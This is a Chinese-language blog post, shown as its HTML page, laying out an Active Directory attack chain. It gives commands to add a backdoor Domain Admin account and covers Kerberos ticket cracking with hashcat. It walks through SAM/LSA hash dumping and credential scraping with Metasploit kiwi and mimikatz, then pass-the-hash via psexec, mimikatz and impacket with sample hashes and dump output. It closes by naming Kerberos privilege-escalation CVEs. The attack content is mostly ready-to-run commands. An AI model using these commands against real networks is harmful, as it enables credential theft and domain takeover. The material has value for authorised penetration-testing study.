

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  
    <meta name="description" content="1. &#x521D;&#x6B65;&#x8FDB;&#x5165;&#x7F51;&#x7EDC;&#x57DF;&#x5185;&#x4FE1;&#x606F;&#x6536;&#x96C6;&#x7528;&#x6237;&#x7BA1;&#x7406;123#&#x57DF;&#x5185;&#x521B;&#x5EFA;&#x65B0;&#x7528;&#x6237;&#x5E76;&amp;">
<meta property="og:type" content="article">
<meta property="og:title" content="域渗透攻击链">
<meta property="og:url" content="http://example.com/2025/05/06/%E5%9F%9F%E6%B8%97%E9%80%8F%E6%94%BB%E5%87%BB%E9%93%BE/index.html">
<meta property="og:site_name" content="lichade&#39;s BLOG">
<meta property="og:description" content="1. &#x521D;&#x6B65;&#x8FDB;&#x5165;&#x7F51;&#x7EDC;&#x57DF;&#x5185;&#x4FE1;&#x606F;&#x6536;&#x96C6;&#x7528;&#x6237;&#x7BA1;&#x7406;123#&#x57DF;&#x5185;&#x521B;&#x5EFA;&#x65B0;&#x7528;&#x6237;&#x5E76;&amp;">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2025-05-06T08:00:32.000Z">
<meta property="article:modified_time" content="2025-05-06T08:02:11.203Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="内网渗透">
<meta property="article:tag" content="域渗透">
<meta name="twitter:card" content="summary_large_image">
  
  
  
  <title>域渗透攻击链 - lichade&#39;s BLOG</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>lichade&#39;s blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="域渗透攻击链"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-05-06 16:00" pubdate>
          2025年5月6日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          3.2k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          28 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">域渗透攻击链</h1>
            
            
              <div class="markdown-body">
                
                <h2 id="1-&#x521D;&#x6B65;&#x8FDB;&#x5165;&#x7F51;&#x7EDC;"><a href="#1-&#x521D;&#x6B65;&#x8FDB;&#x5165;&#x7F51;&#x7EDC;" class="headerlink" title="1. &#x521D;&#x6B65;&#x8FDB;&#x5165;&#x7F51;&#x7EDC;"></a>1. &#x521D;&#x6B65;&#x8FDB;&#x5165;&#x7F51;&#x7EDC;</h2><h3 id="&#x57DF;&#x5185;&#x4FE1;&#x606F;&#x6536;&#x96C6;"><a href="#&#x57DF;&#x5185;&#x4FE1;&#x606F;&#x6536;&#x96C6;" class="headerlink" title="&#x57DF;&#x5185;&#x4FE1;&#x606F;&#x6536;&#x96C6;"></a>&#x57DF;&#x5185;&#x4FE1;&#x606F;&#x6536;&#x96C6;</h3><h3 id="&#x7528;&#x6237;&#x7BA1;&#x7406;"><a href="#&#x7528;&#x6237;&#x7BA1;&#x7406;" class="headerlink" title="&#x7528;&#x6237;&#x7BA1;&#x7406;"></a>&#x7528;&#x6237;&#x7BA1;&#x7406;</h3><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-comment">#&#x57DF;&#x5185;&#x521B;&#x5EFA;&#x65B0;&#x7528;&#x6237;&#x5E76;&#x6DFB;&#x52A0;&#x5230;&#x7BA1;&#x7406;&#x5458;&#x7EC4;</span><br>net<span class="hljs-built_in"> user </span>lichade 123456 /<span class="hljs-built_in">add</span> /domain<br>net<span class="hljs-built_in"> group </span><span class="hljs-string">&quot;Domain admins&quot;</span> lichade /<span class="hljs-built_in">add</span> /domain<br></code></pre></td></tr></table></figure>

<h3 id="hashcat&#x4F7F;&#x7528;"><a href="#hashcat&#x4F7F;&#x7528;" class="headerlink" title="hashcat&#x4F7F;&#x7528;"></a>hashcat&#x4F7F;&#x7528;</h3><p>hashcat -m 13100 &#x548C; hashcat -m 18200 &#x4EE3;&#x8868;&#x4E24;&#x79CD;&#x4E0D;&#x540C;&#x7684;&#x54C8;&#x5E0C;&#x7B97;&#x6CD5;&#x6A21;&#x5F0F;&#xFF0C;&#x5177;&#x4F53;&#x533A;&#x522B;&#x5982;&#x4E0B;:</p>
<figure class="highlight elm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs elm">-m <span class="hljs-number">13100</span> (<span class="hljs-type">Kerberos</span> <span class="hljs-number">5</span> <span class="hljs-type">TGS</span>-<span class="hljs-type">REP</span> e<span class="hljs-keyword">type</span> 23):<br></code></pre></td></tr></table></figure>

<pre><code class="hljs">&#x8FD9;&#x4E2A;&#x6A21;&#x5F0F;&#x7528;&#x4E8E;&#x7834;&#x89E3; Kerberos &#x7968;&#x636E; (TGS-REP, Ticket Granting Service Response)&#xFF0C;&#x5176;&#x52A0;&#x5BC6;&#x65B9;&#x5F0F;&#x662F; etype 23&#xFF0C;&#x5373;&#x4F7F;&#x7528;&#x4E86; RC4-HMAC &#x52A0;&#x5BC6;&#x3002;
</code></pre>
<p>Kerberos &#x662F;&#x4E00;&#x79CD;&#x5E38;&#x89C1;&#x7684;&#x7F51;&#x7EDC;&#x8BA4;&#x8BC1;&#x534F;&#x8BAE;&#xFF0C;&#x7279;&#x522B;&#x662F;&#x5728;&#x5FAE;&#x8F6F;&#x7684; Active Directory &#x73AF;&#x5883;&#x4E2D;&#x88AB;&#x5E7F;&#x6CDB;&#x4F7F;&#x7528;&#x3002;&#x8FD9;&#x4E2A;&#x6A21;&#x5F0F;&#x5BF9;&#x5E94;&#x7684;&#x662F;&#x7834;&#x89E3;&#x4F7F;&#x7528; etype 23 &#x52A0;&#x5BC6;&#x7684; Kerberos &#x7968;&#x636E;&#x3002;&#x8BE5;&#x6A21;&#x5F0F;&#x5E38;&#x7528;&#x4E8E;&#x7834;&#x89E3;&#x5728;&#x7F51;&#x7EDC;&#x4E0A;&#x6355;&#x83B7;&#x5230;&#x7684; Kerberos &#x8BA4;&#x8BC1;&#x7968;&#x636E;&#xFF0C;&#x4ECE;&#x800C;&#x83B7;&#x53D6;&#x7528;&#x6237;&#x7684;&#x51ED;&#x636E;&#x3002;</p>
<figure class="highlight elm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs elm">-m <span class="hljs-number">18200</span> (<span class="hljs-type">Kerberos</span> <span class="hljs-number">5</span> <span class="hljs-type">AS</span>-<span class="hljs-type">REP</span> e<span class="hljs-keyword">type</span> 23):<br></code></pre></td></tr></table></figure>

<pre><code class="hljs">&#x8FD9;&#x4E2A;&#x6A21;&#x5F0F;&#x7528;&#x4E8E;&#x7834;&#x89E3; Kerberos &#x8BA4;&#x8BC1;&#x8BF7;&#x6C42; (AS-REP, Authentication Service Response)&#xFF0C;&#x4E5F;&#x662F;&#x4F7F;&#x7528; etype 23 &#x52A0;&#x5BC6;&#xFF0C;&#x5373; RC4-HMAC&#x3002;&#x4E3B;&#x8981;&#x9488;&#x5BF9; Kerberos &#x7684;&#x53E6;&#x4E00;&#x90E8;&#x5206;&#xFF0C;&#x5373;&#x8BA4;&#x8BC1;&#x670D;&#x52A1; (Authentication Service)&#xFF0C;&#x901A;&#x8FC7;&#x7834;&#x89E3; AS-REP &#x7684;&#x54CD;&#x5E94;&#xFF0C;&#x653B;&#x51FB;&#x8005;&#x80FD;&#x591F;&#x76F4;&#x63A5;&#x83B7;&#x53D6;&#x7528;&#x6237;&#x7684; NTLM hash&#x3002;&#x5E38;&#x89C1;&#x7684;&#x653B;&#x51FB;&#x65B9;&#x5F0F;&#x662F; &quot;AS-REP Roasting&quot;&#xFF0C;&#x8FD9;&#x662F;&#x9488;&#x5BF9;&#x4E0D;&#x9700;&#x8981;&#x9884;&#x8BA4;&#x8BC1;&#x7684;&#x7528;&#x6237;&#xFF0C;&#x901A;&#x8FC7;&#x6293;&#x53D6; AS-REP &#x54CD;&#x5E94;&#x5E76;&#x7834;&#x89E3;&#x5176;&#x52A0;&#x5BC6;&#x5185;&#x5BB9;&#x3002;
</code></pre>
<p><strong>&#x603B;&#x7ED3;</strong></p>
<figure class="highlight diff"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs diff"><span class="hljs-deletion">-m 13100 &#x9488;&#x5BF9;&#x7684;&#x662F; Kerberos &#x7684; TGS-REP &#x9636;&#x6BB5;&#xFF0C;&#x5373;&#x670D;&#x52A1;&#x7968;&#x636E;&#x7684;&#x89E3;&#x5BC6;&#x3002;</span><br><br><span class="hljs-deletion">-m 18200 &#x9488;&#x5BF9;&#x7684;&#x662F; Kerberos &#x7684; AS-REP &#x9636;&#x6BB5;&#xFF0C;&#x5373;&#x8BA4;&#x8BC1;&#x8BF7;&#x6C42;&#x7684;&#x89E3;&#x5BC6;&#x3002;</span><br></code></pre></td></tr></table></figure>

<h2 id="2-&#x6A2A;&#x5411;&#x79FB;&#x52A8;&#x4E0E;&#x521D;&#x6B65;&#x51ED;&#x636E;&#x83B7;&#x53D6;"><a href="#2-&#x6A2A;&#x5411;&#x79FB;&#x52A8;&#x4E0E;&#x521D;&#x6B65;&#x51ED;&#x636E;&#x83B7;&#x53D6;" class="headerlink" title="2. &#x6A2A;&#x5411;&#x79FB;&#x52A8;&#x4E0E;&#x521D;&#x6B65;&#x51ED;&#x636E;&#x83B7;&#x53D6;"></a>2. &#x6A2A;&#x5411;&#x79FB;&#x52A8;&#x4E0E;&#x521D;&#x6B65;&#x51ED;&#x636E;&#x83B7;&#x53D6;</h2><p><strong>&#x524D;&#x63D0;&#xFF1A;&#x57DF;&#x5185;&#x4E3B;&#x673A;&#x7684;&#x57DF;&#x7BA1;&#x7406;&#x5458;&#x5BC6;&#x7801;&#x90FD;&#x4E3A;&#x76F8;&#x540C;&#x7684;&#x5BC6;&#x7801;&#x3002;</strong></p>
<h3 id="MSF&#x5B9E;&#x73B0;hash&#x4F20;&#x9012;"><a href="#MSF&#x5B9E;&#x73B0;hash&#x4F20;&#x9012;" class="headerlink" title="MSF&#x5B9E;&#x73B0;hash&#x4F20;&#x9012;"></a>MSF&#x5B9E;&#x73B0;hash&#x4F20;&#x9012;</h3><p>&#x62FF;&#x5230;meterpreter shell&#x540E;&#xFF0C;&#x52A0;&#x8F7D;KIWI&#x6A21;&#x5757;</p>
<figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ebnf"><span class="hljs-attribute">load kiwi</span><br></code></pre></td></tr></table></figure>

<p>&#x83B7;&#x53D6;&#x7CFB;&#x7EDF;&#x7EA7;&#x64CD;&#x4F5C;&#x6743;&#x9650;&#x540E;&#x5BFC;&#x51FA;hash (HASH NTLM)</p>
<figure class="highlight autohotkey"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs autohotkey">getsystem<br>ls<span class="hljs-built_in">a_dump</span>_sam<br></code></pre></td></tr></table></figure>

<p><em>&#x5047;&#x8BBE;&#x5185;&#x7F51;&#x57DF;&#x4E3A;10.10.10.0/24</em></p>
<p>&#x642D;&#x5EFA;&#x5185;&#x7F51;&#x8DEF;&#x7531;</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">run</span> autoroute -s <span class="hljs-number">10.10.10.0</span>/<span class="hljs-number">24</span><br></code></pre></td></tr></table></figure>

<p>&#x4F7F;&#x7528;arp_scan&#x626B;&#x63CF;&#x5185;&#x7F51;&#x5B58;&#x6D3B;&#x4E3B;&#x673A;</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-built_in">run</span> post/windows/gather/arp_scanner <span class="hljs-attribute">rhosts</span>=10.10.10.0/24<br><br>background	#&#x56DE;&#x5230;msfconsole<br></code></pre></td></tr></table></figure>

<p>&#x5F00;&#x59CB;&#x8FDB;&#x884C;hash&#x4F20;&#x9012;&#x653B;&#x51FB;10.10.10.10</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-built_in">set</span> rhost 10.10.10.10<br>use exploit/windows/smb/psexec<br><span class="hljs-built_in">set</span> smbpass 00000000000000000000000000000000:hash	#32&#x4E2A;0:&#x4E4B;&#x524D;&#x83B7;&#x53D6;&#x7684;HASH NTLM<br><span class="hljs-built_in">set</span> smbuser administrator<br><span class="hljs-built_in">set</span> lhost 192.168.1.1<br><span class="hljs-built_in">set</span> lport 8881<br>show options	#&#x786E;&#x8BA4;&#x65E0;&#x8BEF;<br>run<br></code></pre></td></tr></table></figure>

<p>&#x6267;&#x884C;&#x6210;&#x529F;&#x540E;&#x5373;&#x53EF;&#x83B7;&#x53D6;10.10.10.10&#x7684;meterpreter shell</p>
<h3 id="Mimikatz&#x5B9E;&#x73B0;hash&#x4F20;&#x9012;"><a href="#Mimikatz&#x5B9E;&#x73B0;hash&#x4F20;&#x9012;" class="headerlink" title="Mimikatz&#x5B9E;&#x73B0;hash&#x4F20;&#x9012;"></a>Mimikatz&#x5B9E;&#x73B0;hash&#x4F20;&#x9012;</h3><p>&#x4E0A;&#x4F20;msf&#x6728;&#x9A6C;&#x83B7;&#x5F97;meterpreter shell</p>
<figure class="highlight avrasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs avrasm"><span class="hljs-meta">#&#x4E0A;&#x4F20;mimikatz</span><br>meterpreter &gt; upload tools/mimikatz.exe ./<br>meterpreter &gt; shell<br>mimikatz.exe<br><span class="hljs-meta">#&#x63D0;&#x5347;&#x6743;&#x9650;</span><br><span class="hljs-symbol">privilege:</span>:debug<br><span class="hljs-meta">#&#x6293;&#x53D6;&#x5BC6;&#x7801;</span><br><span class="hljs-symbol">sekurlsa:</span>:logonpasswords<br><br><span class="hljs-meta">#&#x83B7;&#x5F97;ntlm: 6136ba14352c8a09405bb14912797793</span><br></code></pre></td></tr></table></figure>

<p><em>&#x5047;&#x8BBE;10.10.10.10&#x4E3A;&#x57DF;&#x63A7;dc</em></p>
<p>&#x4F7F;&#x7528;mimikatz</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs bash">privilege::debug<br><span class="hljs-comment">#&#x4F7F;&#x7528;ip&#x653B;&#x51FB;</span><br>sekurlsa::pth /user:administrator /domain:10.10.10.10 /ntlm:6136ba14352c8a09405bb14912797793<br><span class="hljs-comment">#&#x4F7F;&#x7528;&#x57DF;&#x540D;&#x653B;&#x51FB;</span><br>sekurlsa::pth /user:administrator /domain:<span class="hljs-string">&quot;wings.com&quot;</span> /ntlm:6136ba14352c8a09405bb14912797793<br></code></pre></td></tr></table></figure>

<p>&#x4F1A;&#x5F39;&#x51FA;&#x4E00;&#x4E2A;&#x65B0;&#x7684;cmd&#xFF0C;&#x5C1D;&#x8BD5;&#x5EFA;&#x7ACB;&#x8FDE;&#x63A5;</p>
<figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs elixir"><span class="hljs-comment">#&#x4F7F;&#x7528;ip&#x8FDE;&#x63A5;</span><br>net <span class="hljs-keyword">use</span> \\<span class="hljs-number">10.10</span>.<span class="hljs-number">10.10</span>\c<span class="hljs-variable">$</span><br><span class="hljs-variable"></span><span class="hljs-comment">#&#x4F7F;&#x7528;&#x57DF;&#x540D;&#x8FDE;&#x63A5;</span><br>net <span class="hljs-keyword">use</span> \\<span class="hljs-title class_">WIN</span><span class="hljs-number">-13</span>L1MQMKNIO.wings.com\c<span class="hljs-variable">$</span><br><span class="hljs-variable"></span><br>dir \\\<span class="hljs-number">10.10</span>.<span class="hljs-number">10.10</span>\c$<br></code></pre></td></tr></table></figure>

<h3 id="impacket&#x5B9E;&#x73B0;hash&#x4F20;&#x9012;"><a href="#impacket&#x5B9E;&#x73B0;hash&#x4F20;&#x9012;" class="headerlink" title="impacket&#x5B9E;&#x73B0;hash&#x4F20;&#x9012;"></a>impacket&#x5B9E;&#x73B0;hash&#x4F20;&#x9012;</h3><p>&#x9996;&#x5148;&#x5728;meterpreter&#x4E0B;&#x83B7;&#x53D6;ntlm</p>
<figure class="highlight clean"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><code class="hljs clean">meterpreter &gt; load kiwi<br>Loading extension kiwi...<br>  .#####.   mimikatz <span class="hljs-number">2.2</span><span class="hljs-number">.0</span> <span class="hljs-number">20191125</span> (x64/windows)<br> .## ^ ##.  <span class="hljs-string">&quot;A La Vie, A L&apos;Amour&quot;</span> - (oe.eo)<br> ## / \ ##  <span class="hljs-comment">/*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )</span><br><span class="hljs-comment"> ## \ / ##       &gt; http://blog.gentilkiwi.com/mimikatz</span><br><span class="hljs-comment"> &apos;## v ##&apos;        Vincent LE TOUX            ( vincent.letoux@gmail.com )</span><br><span class="hljs-comment">  &apos;#####&apos;         &gt; http://pingcastle.com / http://mysmartlogon.com  ***/</span><br><br>Success.<br>meterpreter &gt; getsystem<br>...got <span class="hljs-keyword">system</span> via technique <span class="hljs-number">1</span> (Named Pipe Impersonation (In Memory/Admin)).<br>meterpreter &gt; lsa_dump_sam<br>[+] Running <span class="hljs-keyword">as</span> SYSTEM<br>[*] Dumping SAM<br>Domain : WIN-H1VEP8O3329<br>SysKey : <span class="hljs-number">75e34</span>ba838f4381c2c0d574bf21d0484<br>Local SID : S<span class="hljs-number">-1</span><span class="hljs-number">-5</span><span class="hljs-number">-21</span><span class="hljs-number">-3773877399</span><span class="hljs-number">-1753912815</span><span class="hljs-number">-3877822800</span><br><br>SAMKey : <span class="hljs-number">1928670</span>b9045e552d5facb362e829960<br><br>RID  : <span class="hljs-number">000001</span>f4 (<span class="hljs-number">500</span>)<br>User : Administrator<br>  Hash NTLM: <span class="hljs-number">6136</span>ba14352c8a09405bb14912797793<br><br>RID  : <span class="hljs-number">000001</span>f5 (<span class="hljs-number">501</span>)<br>User : Guest<br><br></code></pre></td></tr></table></figure>

<p>&#x642D;frp&#x4EE3;&#x7406;</p>
<p>&#x4F7F;&#x7528;kali&#x81EA;&#x5E26;&#x7684;impacket&#x8FDE;&#x63A5;</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">proxychains4</span> impacket-smbexec WIN-H1VEP8O3329/administrator@<span class="hljs-number">10.10.10.10</span> -hashes <span class="hljs-number">00000000000000000000000000000000</span>:<span class="hljs-number">6136</span>ba14352c8a09405bb14912797793<br><br><span class="hljs-attribute">proxychains4</span> impacket-wmiexec WIN-H1VEP8O3329/administrator@<span class="hljs-number">10.10.10.10</span> -hashes <span class="hljs-number">00000000000000000000000000000000</span>:<span class="hljs-number">6136</span>ba14352c8a09405bb14912797793<br><br><span class="hljs-attribute">proxychains4</span> impacket-psexec WIN-H1VEP8O3329/administrator@<span class="hljs-number">10.10.10.10</span> -hashes <span class="hljs-number">00000000000000000000000000000000</span>:<span class="hljs-number">6136</span>ba14352c8a09405bb14912797793<br></code></pre></td></tr></table></figure>

<h2 id="3-&#x6743;&#x9650;&#x63D0;&#x5347;"><a href="#3-&#x6743;&#x9650;&#x63D0;&#x5347;" class="headerlink" title="3. &#x6743;&#x9650;&#x63D0;&#x5347;"></a>3. &#x6743;&#x9650;&#x63D0;&#x5347;</h2><ul>
<li><strong>MS14-068</strong> &#x548C; <strong>CVE-2021-42287</strong> &#x662F;Kerberos&#x6F0F;&#x6D1E;&#xFF0C;&#x653B;&#x51FB;&#x8005;&#x53EF;&#x4EE5;&#x5229;&#x7528;&#x8FD9;&#x4E9B;&#x6F0F;&#x6D1E;&#x4ECE;&#x666E;&#x901A;&#x7528;&#x6237;&#x6743;&#x9650;&#x63D0;&#x5347;&#x4E3A;&#x57DF;&#x7BA1;&#x7406;&#x5458;&#x6743;&#x9650;&#x3002;</li>
<li><strong>CVE-2020-1472 (ZeroLogon)</strong>  &#x5141;&#x8BB8;&#x653B;&#x51FB;&#x8005;&#x76F4;&#x63A5;&#x91CD;&#x7F6E;&#x57DF;&#x63A7;&#x5236;&#x5668;&#x7684;&#x5BC6;&#x7801;&#xFF0C;&#x7ACB;&#x5373;&#x83B7;&#x5F97;&#x57DF;&#x7BA1;&#x7406;&#x5458;&#x6743;&#x9650;&#x3002;</li>
</ul>
<h3 id="MS14-068&#xFF08;&#x672C;&#x673A;&#x63D0;&#x6743;&#xFF09;"><a href="#MS14-068&#xFF08;&#x672C;&#x673A;&#x63D0;&#x6743;&#xFF09;" class="headerlink" title="MS14-068&#xFF08;&#x672C;&#x673A;&#x63D0;&#x6743;&#xFF09;"></a>MS14-068&#xFF08;&#x672C;&#x673A;&#x63D0;&#x6743;&#xFF09;</h3><p><strong>&#x5229;&#x7528;&#x6761;&#x4EF6;&#xFF1A;Win Server2000 &#x4EE5;&#x4E0A;&#x4E14;&#x672A;&#x5B89;&#x88C5;KB3011780&#x8865;&#x4E01;</strong></p>
<figure class="highlight crmsh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs crmsh"><span class="hljs-comment">#&#x67E5;&#x770B;&#x5F53;&#x524D;&#x7528;&#x6237;&#x662F;&#x5426;&#x4E3A;&#x57DF;&#x7528;&#x6237;</span><br>net <span class="hljs-keyword">user</span> <span class="hljs-title">wintext</span> /domain<br><span class="hljs-comment">#&#x67E5;&#x770B;&#x4FEE;&#x8865;&#x7A0B;&#x5E8F;</span><br>system<span class="hljs-literal">inf</span>o<br></code></pre></td></tr></table></figure>

<p>&#x4E0A;&#x4F20; MS14-068&#x3001;Psexec64&#x3001;mimikatz &#x5DE5;&#x5177;&#x5230;&#x76EE;&#x6807;&#x673A;&#x5668;</p>
<p>cmd&#x6536;&#x96C6;&#x76EE;&#x6807;&#x4E3B;&#x673A;&#x7684;&#x57DF;&#x540D;&#x3001;&#x7528;&#x6237;SID&#x3001;&#x57DF;&#x63A7;&#x5730;&#x5740;</p>
